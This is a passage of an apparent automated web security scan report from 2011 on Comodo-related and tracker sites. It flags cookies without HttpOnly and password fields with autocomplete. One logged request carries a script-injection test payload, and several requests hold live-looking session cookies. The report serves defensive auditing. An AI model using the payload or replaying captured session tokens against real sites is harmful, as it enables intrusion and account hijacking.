User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; NID=51=mCI0VZozMcVtfOnsXPWKRIg4CFYHD91WLLi_uPVaxjIGdNNCCPTpbb-Y6ItlcrUaFRZ1_uYF76XD4xG_aXDqKnNnWckAgZKDE_tqIYZX_5tTbL1lkWSJHXddkQriOGGX; SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjraOk0NnKnon18FmQ0anHqw5G5b8D7UKVV-fvoBa-B7nHUAI1yJPXkeoZPmNzpO5TVyyzlW1fNxwBHtH2HmDETt4jQdxjCyPqZ0_Mz1dsplqhrmR2JS56T55_h5iz2URKMamLZkIdrgZB_dQvqVSloGJgky-ppUKdS0uO8737_ewtjmsYtlOysbxj00Pjud9F-PuoMEpszT-bzZhHJBEZepn0S0pmDxxr7KidOd1oXi21FARDUcsfI_WLw-qAvsGbFgIXIj_A7xnaM4KZLe8U31tgLzYqwxvP5awMCzfx50c

Response

HTTP/1.1 200 OK
Set-Cookie: SID=DQAAAPAAAAD7Xl0oDS_3Xy0JKwYeKgRj5Y_McDPpUTRM70c1_kfRaM0t1NIGOeKymCZf_GkU6cxXYEHblQwAvGR_WSjcMuxkvK3WyncNjjtSf5BO7OMdVM8V2NjhVDXfhMJ6l8gPKEvJNy95-i_R-RDOyY0ADU6-pKSHuPOnJlY5NCKau5HhqlG4rtz9dlPp2-RUQ0e00xAg-03wDCA5Aya4w2pvz_sx9PKUz4Z_p_7XpMhOQPpQoHjbly5_fRWrgbicqscZk4n9CAAkmJfJLiLOih9pzf-hVx55GXF4ceDiaulA2MQUbxeqBsxvSi3H3-auSOBF0i8;Domain=.google.com;Path=/;Expires=Wed, 15-Sep-2021 12:19:27 GMT
Content-Type: text/javascript; charset=utf-8
P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Expires: Sun, 18 Sep 2011 12:19:27 GMT
Date: Sun, 18 Sep 2011 12:19:27 GMT
Cache-Control: private, max-age=3600
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 5519

window.___jsl=window.___jsl||{};
window.___jsl.h=window.___jsl.h||'r;gc\/23803279-4555db52';
window.___jsl.l=[];
window.__GOOGLEAPIS=window.__GOOGLEAPIS||{};
window.__GOOGLEAPIS.gwidget=window.__GOOGL
...[SNIP]...

6.10. http://log.optimizely.com/event previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://log.optimizely.com
Path:	/event

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

external_8018129_bucket_map=8022314%3A8017411; expires=Wed, 15-Sep-2021 01:49:45 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event?a=8018129&e=1&n=http%3A%2F%2Fwww.comodo.com%2F&u=oeu1315419552319r0.6822604623157531&y=false&x8022314=8017411&t=1316328651420 HTTP/1.1
Host: log.optimizely.com
Proxy-Connection: keep-alive
Referer: http://www.comodo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: external_5879383_end_user_id=oeu1314998032371r0.5426059009041637; external_8018129_end_user_id=oeu1315419552319r0.6822604623157531; external_5830034_end_user_id=oeu1316239542576r0.9213690920732915

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Date: Sun, 18 Sep 2011 01:49:45 GMT
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Server: nginx/0.8.54
Set-Cookie: external_8018129_bucket_map=8022314%3A8017411; expires=Wed, 15-Sep-2021 01:49:45 GMT
Content-Length: 35
Connection: keep-alive

GIF89a.............,...........D..;

6.11. http://server.iad.liveperson.net/hc/61298727/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://server.iad.liveperson.net
Path:	/hc/61298727/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

HumanClickSiteContainerID_61298727=STANDALONE; path=/hc/61298727

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.12. http://server.iad.liveperson.net/hc/61298727/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://server.iad.liveperson.net
Path:	/hc/61298727/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

HumanClickKEY=6096801432485254544; path=/hc/61298727
HumanClickACTIVE=1316310600121; expires=Mon, 19-Sep-2011 01:50:00 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/61298727/?visitor=&msessionkey=&site=61298727&cmd=knockPage&page=http%3A//www.instantssl.com/&visitorStatus=INSITE_STATUS&activePlugin=none&pageWindowName=&javaSupport=true&id=125749232&scriptVersion=1.1&d=1316328664526&title=SSL%20Certificate%20From%20Comodo%u2122%20with%20Free%20SSL%20Certificates%20and%20Server%20Certificates%20%u2013%20Digital%20Certificate%20Authority&referrer=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dcomodo HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.instantssl.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=717244329590173063; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1316310590892

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 01:50:00 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=6096801432485254544; path=/hc/61298727
Set-Cookie: HumanClickACTIVE=1316310600121; expires=Mon, 19-Sep-2011 01:50:00 GMT; path=/
Content-Type: image/gif
Last-Modified: Sun, 18 Sep 2011 01:50:00 GMT
Cache-Control: private
Content-Length: 34

GIF89aZ............,...........L.;

6.13. http://server.iad.liveperson.net/hc/61298727/x.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://server.iad.liveperson.net
Path:	/hc/61298727/x.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

HumanClickACTIVE=1316310592783; expires=Mon, 19-Sep-2011 01:49:52 GMT; path=/
HumanClickKEY=2402553747963169661; path=/hc/61298727

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/61298727/x.js?cmd=file&file=chatScript3&site=61298727&&imageUrl=http://www.instantssl.com/ssl-certificate-images/liveperson/sales HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.instantssl.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1316296223985

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 01:49:52 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1316310592783; expires=Mon, 19-Sep-2011 01:49:52 GMT; path=/
Set-Cookie: HumanClickKEY=2402553747963169661; path=/hc/61298727
Cache-Control: max-age=900
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sun, 18 Sep 2011 01:49:52 GMT
Content-Length: 33363

var SCRIPT_VERSION = "1.1";

if (typeof(lpNumber) == "undefined")
lpNumber = '61298727';

var lpUseFirstParty = ("true" == "false");
var lpUseSecureCookies = ("true" == "false");
var lpUseSessionC
...[SNIP]...

6.14. http://www.bizographics.com/collect/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bizographics.com
Path:	/collect/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BizographicsOptOut=OPT_OUT; Domain=.bizographics.com; Expires=Fri, 16-Sep-2016 12:16:27 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /collect/?pid=749&url=http%3A%2F%2Fwww.govinfosecurity.com%2Farticles.php%3Fart_id%3D4067%26ceb4a%2527%253E%253Cscript%253Ealert(document.location)%253C%2Fscript%253Eae00085e7e2%3D1&pageUrl=http%3A%2F%2Fwww.govinfosecurity.com%2Farticles.php%3Fart_id%3D4067%26ceb4a%2527%253E%253Cscript%253Ealert(document.location)%253C%2Fscript%253Eae00085e7e2%3D1&ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&time=1316366252200 HTTP/1.1
Host: www.bizographics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.govinfosecurity.com/articles.php?art_id=4067&ceb4a%27%3E%3Cscript%3Ealert(document.location)%3C/script%3Eae00085e7e2=1
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sun, 18 Sep 2011 12:16:27 GMT
Server: nginx/0.7.61
Set-Cookie: BizographicsID=""; Domain=.bizographics.com; Expires=Sun, 18-Sep-2011 12:16:28 GMT; Path=/
Set-Cookie: BizoID=""; Domain=.bizographics.com; Expires=Sun, 18-Sep-2011 12:16:28 GMT; Path=/
Set-Cookie: BizoData=""; Domain=.bizographics.com; Expires=Sun, 18-Sep-2011 12:16:28 GMT; Path=/
Set-Cookie: BizoCustomSegments=""; Domain=.bizographics.com; Expires=Sun, 18-Sep-2011 12:16:28 GMT; Path=/
Set-Cookie: BizographicsOptOut=OPT_OUT; Domain=.bizographics.com; Expires=Fri, 16-Sep-2016 12:16:27 GMT; Path=/
Content-Length: 9
Connection: keep-alive

//opt out

6.15. http://www.seeos.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.seeos.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=www4e75df0eb30884.96319108; expires=Mon, 19-Sep-2011 12:07:42 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.seeos.com
Proxy-Connection: keep-alive
Referer: http://www.trustix.com/small/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:07:42 GMT
Server: Apache/2.2.17 (Ubuntu)
X-Powered-By: PHP/5.3.5-1ubuntu7.2
Set-Cookie: uid=www4e75df0eb30884.96319108; expires=Mon, 19-Sep-2011 12:07:42 GMT
Vary: Accept-Encoding
Content-Length: 831
Connection: close
Content-Type: text/html

<html>
<head>
<title>seeos.com: The Leading See OS Site on the Net</title>
</head>
<frameset cols="1,*,1" border=0>
<frame name="top" src="tg.php?uid=www4e75df0eb30884.96319108&src=&cat=travel&kw=Se
...[SNIP]...

7. Password field with autocomplete enabled previous next
There are 70 instances of this issue:

http://efaxcorporate.com/
http://efaxcorporate.com/
http://efaxcorporate.com/solutions/Compatibility/Industry-Compatibility
http://efaxcorporate.com/solutions/Compatibility/Industry-Compatibility
http://forum.psoft.net/
http://forums.comodo.com/
http://forums.comodo.com/
http://hackerguardian.com/pci-compliance/addsupport/ssl-purchase.html
https://hackerguardian.com/pci-compliance/addsupport/ssl-purchase.html
https://my.psoft.net/my-hsphere/
https://secure.comodo.com/home/purchase.php
https://secure.comodo.com/products/frontpage
https://secure.comodo.net/home/purchase.php
https://secure.comodo.net/products/frontpage
https://secure.instantssl.com/products/SSLIdASignup1a
https://secure.instantssl.com/products/frontpage
https://secure.trustfax.com/doccorpweb/tf/tf_signup.jsp
https://secure.trustfax.com/doccorpweb/tf/tf_signup.jsp
https://support.comodo.com/
https://support.comodo.com/index.php
http://www.comodo.com/login/comodo-members.php
https://www.comodo.com/login/comodo-members.php
http://www.comodopartners.com/partner/evssl.html
http://www.comodopartners.com/partner/partnerdoc.html
http://www.comodopartners.com/partner/rootkey.html
http://www.comodopartners.com/partner/trustlogo.html
http://www.contentverification.com/
http://www.contentverification.com/confidence_pak-buy.html
http://www.contentverification.com/logos/index.html
http://www.enterprisessl.com/ssl-certificate-products/addsupport/ssl-purchase.html
https://www.enterprisessl.com/login.html
https://www.hackerguardian.com/login.html
https://www.hackerguardian.com/sas/login.jsp
https://www.instantssl.com/login.html
https://www.j2.com/jconnect/twa/page/homePage
https://www.panopticsecurity.com/PCICS/MerController/doGetLocationManagement
https://www.panopticsecurity.com/PCICS/MerController/doGetLocationManagement
https://www.panopticsecurity.com/PCICS/MerController/doMetaQuestion
https://www.panopticsecurity.com/PCICS/MerController/doMetaQuestions
https://www.panopticsecurity.com/PCICS/MerController/doReviewMeta
https://www.panopticsecurity.com/PCICS/MerController/doStart
https://www.panopticsecurity.com/PCICS/MerController/doUpdateFundamentalAnswers
https://www.panopticsecurity.com/PCICS/PanController/doInitUser
https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser
http://www.trustfax.com/login.html
http://www.trustix.com/login.html
http://www.trustix.com/support/index.html
http://www.vengine.com/
http://www.vengine.com/corporate/about.html
http://www.vengine.com/corporate/contact.html
http://www.vengine.com/products/best_practices.html
http://www.vengine.com/products/features.html
http://www.vengine.com/products/free_tools.html
http://www.vengine.com/products/overview.html
http://www.vengine.com/products/prove_it.html
http://www.vengine.com/products/tour.html
http://www.vengine.com/products/vengine/eula.html
http://www.vengine.com/products/vengine/faq.html
http://www.vengine.com/products/vengine/first_time.html
http://www.vengine.com/products/vengine/help.html
http://www.vengine.com/products/vengine/index.html
http://www.vengine.com/products/vengine/options.html
http://www.vengine.com/products/vengine/requirements.html
http://www.vengine.com/products/vengine/setup.html
http://www.vengine.com/products/vengine/ssl_feedback.html
http://www.vengine.com/products/vengine/uninstall.html
http://www.vengine.com/sitemap.html
http://www.vengine.com/support/faq.html
http://www.vengine.com/support/index.html
https://www.vengine.com/

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

7.1. http://efaxcorporate.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://efaxcorporate.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://www.efaxcorporate.com/corp/twa/login

The form contains the following password field with autocomplete enabled:

password

Request

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:19:20 GMT
Server: Apache
Vary: Host,Accept-Encoding
X-Magnolia-Registration: Registered
Set-Cookie: JSESSIONID=37657A97FCC62C80A944C9835E8E0575.efaxcorp1b; Path=/efaxcorp-cms-public
Set-Cookie: brand=efaxcorp; Domain=.efaxcorporate.com; Path=/
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:19:20 GMT
Content-Length: 56030
X-TWA-Web: pa:28012
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div id="tabContent_admin" class="loginTabContent" style="display: none;"> <form novalidate="novalidate" action="https://www.efaxcorporate.com/corp/twa/login" name="admin" id="admin" method="POST" style="width: 100%;"> <input type="hidden" name="formName" value="admin" />
...[SNIP]...
<div style="margin-bottom: 5px; clear: both;"><input type="password" id="adminpassword" maxlength="25" size="15" setcookie="false" name="password" value="" onkeyup="isValid(this, 'option')" onblur="isValid(this, 'option');" required="true" validationtype="password" style="float: left;" class="textInput" /> <div style="clear: both;">
...[SNIP]...

7.2. http://efaxcorporate.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://efaxcorporate.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://www.efaxcorporate.com/corp/twa/login

The form contains the following password field with autocomplete enabled:

password

Request

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:19:20 GMT
Server: Apache
Vary: Host,Accept-Encoding
X-Magnolia-Registration: Registered
Set-Cookie: JSESSIONID=37657A97FCC62C80A944C9835E8E0575.efaxcorp1b; Path=/efaxcorp-cms-public
Set-Cookie: brand=efaxcorp; Domain=.efaxcorporate.com; Path=/
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:19:20 GMT
Content-Length: 56030
X-TWA-Web: pa:28012
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div id="tabContent_user" class="loginTabContent" style=""> <form novalidate="novalidate" action="https://www.efaxcorporate.com/corp/twa/login" name="user" id="user" method="POST" style="width: 100%;"> <input type="hidden" name="formName" value="user" />
...[SNIP]...
<div style="margin-bottom: 5px; clear: both;"><input type="password" id="userpassword" maxlength="20" size="15" setcookie="false" name="password" value="" onkeyup="isValid(this, '');" onblur="isValid(this, '');" required="true" validationtype="password" style="float: left;" class="textInput" /> <div style="clear: both;">
...[SNIP]...

7.3. http://efaxcorporate.com/solutions/Compatibility/Industry-Compatibility previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://efaxcorporate.com
Path:	/solutions/Compatibility/Industry-Compatibility

Issue detail

The page contains a form with the following action URL:

https://www.efaxcorporate.com/corp/twa/login

The form contains the following password field with autocomplete enabled:

password

Request

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:19:43 GMT
Server: Apache
Vary: Host,Accept-Encoding
X-Magnolia-Registration: Registered
Set-Cookie: JSESSIONID=96D358893B7F3897A12EA3F682AD7C0A.efaxcorp1a; Path=/efaxcorp-cms-public
Set-Cookie: brand=efaxcorp; Domain=.efaxcorporate.com; Path=/
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:19:43 GMT
Content-Length: 39406
X-TWA-Web: pa:28012
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http
...[SNIP]...
<div id="tabContent_user" class="loginTabContent" style=""> <form novalidate="novalidate" action="https://www.efaxcorporate.com/corp/twa/login" name="user" id="user" method="POST" style="width: 100%;"> <input type="hidden" name="formName" value="user" />
...[SNIP]...
<div style="margin-bottom: 5px; clear: both;"><input type="password" id="userpassword" maxlength="20" size="15" setcookie="false" name="password" value="" onkeyup="isValid(this, '');" onblur="isValid(this, '');" required="true" validationtype="password" style="float: left;" class="textInput" /> <div style="clear: both;">
...[SNIP]...

7.4. http://efaxcorporate.com/solutions/Compatibility/Industry-Compatibility previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://efaxcorporate.com
Path:	/solutions/Compatibility/Industry-Compatibility

Issue detail

The page contains a form with the following action URL:

https://www.efaxcorporate.com/corp/twa/login

The form contains the following password field with autocomplete enabled:

password

Request

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:19:43 GMT
Server: Apache
Vary: Host,Accept-Encoding
X-Magnolia-Registration: Registered
Set-Cookie: JSESSIONID=96D358893B7F3897A12EA3F682AD7C0A.efaxcorp1a; Path=/efaxcorp-cms-public
Set-Cookie: brand=efaxcorp; Domain=.efaxcorporate.com; Path=/
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:19:43 GMT
Content-Length: 39406
X-TWA-Web: pa:28012
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http
...[SNIP]...
<div id="tabContent_admin" class="loginTabContent" style="display: none;"> <form novalidate="novalidate" action="https://www.efaxcorporate.com/corp/twa/login" name="admin" id="admin" method="POST" style="width: 100%;"> <input type="hidden" name="formName" value="admin" />
...[SNIP]...
<div style="margin-bottom: 5px; clear: both;"><input type="password" id="adminpassword" maxlength="25" size="15" setcookie="false" name="password" value="" onkeyup="isValid(this, 'option')" onblur="isValid(this, 'option');" required="true" validationtype="password" style="float: left;" class="textInput" /> <div style="clear: both;">
...[SNIP]...

7.5. http://forum.psoft.net/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://forum.psoft.net
Path:	/

Issue detail

The page contains a form with the following action URL:

http://forum.psoft.net/login.php?do=login

The form contains the following password field with autocomplete enabled:

vb_login_password

Request

GET / HTTP/1.1
Host: forum.psoft.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.6. http://forums.comodo.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://forums.comodo.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://forums.comodo.com/index.php?action=login2

The form contains the following password field with autocomplete enabled:

passwrd

Request

GET / HTTP/1.1
Host: forums.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:06:41 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: private
Pragma: no-cache
Last-Modified: Sun, 18 Sep 2011 11:06:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 101044

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <meta http-equiv="Content-T
...[SNIP]...
</script>

                           <form action="https://forums.comodo.com/index.php?action=login2" method="post" style="margin: 3px 1ex 1px 0;">
                               <div style="text-align: right;">
...[SNIP]...
<input type="text" name="user" autocomplete="off" size="10" /> <input type="password" name="passwrd" size="10" />
                                   <select name="cookielength">
...[SNIP]...

7.7. http://forums.comodo.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://forums.comodo.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://forums.comodo.com/index.php?action=login2

The form contains the following password field with autocomplete enabled:

passwrd

Request

GET / HTTP/1.1
Host: forums.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:06:41 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: private
Pragma: no-cache
Last-Modified: Sun, 18 Sep 2011 11:06:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 101044

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <meta http-equiv="Content-T
...[SNIP]...
<td class="windowbg2" valign="middle">
           <form action="https://forums.comodo.com/index.php?action=login2" method="post" style="margin: 0;">
               <table border="0" cellpadding="2" cellspacing="0" width="100%">
...[SNIP]...
<br /><input type="password" name="passwrd" id="passwrd" size="15" /></label>
...[SNIP]...

7.8. http://hackerguardian.com/pci-compliance/addsupport/ssl-purchase.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://hackerguardian.com
Path:	/pci-compliance/addsupport/ssl-purchase.html

Issue detail

The page contains a form with the following action URL:

https://secure.comodo.com/products/!PlaceOrder

The form contains the following password fields with autocomplete enabled:

loginPassword
verifyPassword

Request

GET /pci-compliance/addsupport/ssl-purchase.html HTTP/1.1
Host: hackerguardian.com
Proxy-Connection: keep-alive
Referer: http://hackerguardian.com/hackerguardian/buy/pci_free_scan.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1316362675388r0.6238376419059932; ap=; referrerURL=http%3A//www.comodo.com/e-commerce/; entryURL=http%3A//hackerguardian.com/hackerguardian/buy/pci_free_scan.html; __utma=212060173.773737511.1316362678.1316362678.1316362678.1; __utmc=212060173; __utmz=212060173.1316362678.1.1.utmcsr=comodo.com|utmccn=(referral)|utmcmd=referral|utmcct=/e-commerce/; optimizelyBuckets=%7B%7D; __utmb=212060173.1.10.1316362681; shopcart_s=hgFreePCISS&Free PCI Scan&0&3460; prodid=&3460; currency=USD; region=North%20America; country=US

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:17:24 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 76758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script src="//cdn.opti
...[SNIP]...
</script>

<form onsubmit="return wrapvalidate(validate());" name="evssl" id="evssl" method="post" action="https://secure.comodo.com/products/!PlaceOrder" onSubmit="javascript:__utmLinkPost('/G/securepurchase/HG-addsupport_sslpurchase/proceedtocheckout_btn')">
<script type="text/javascript" >
...[SNIP]...
<td align="left" valign="top">
<input name="loginPassword" type="password" id="loginPassword" value="" size="45"> 
<!--<a onClick="javascript:popUp('password-rules.html')" style="cursor:pointer " name="Rules for Password Complexity">
...[SNIP]...
<td align="left" valign="top">
<input name="verifyPassword" type="password" id="verifyPassword" value="" size="45"></td>
...[SNIP]...

7.9. https://hackerguardian.com/pci-compliance/addsupport/ssl-purchase.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hackerguardian.com
Path:	/pci-compliance/addsupport/ssl-purchase.html

Issue detail

The page contains a form with the following action URL:

https://secure.comodo.com/products/!PlaceOrder

The form contains the following password fields with autocomplete enabled:

loginPassword
verifyPassword

Request

GET /pci-compliance/addsupport/ssl-purchase.html HTTP/1.1
Host: hackerguardian.com
Connection: keep-alive
Referer: https://hackerguardian.com/hackerguardian/buy/pci_free_scan.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
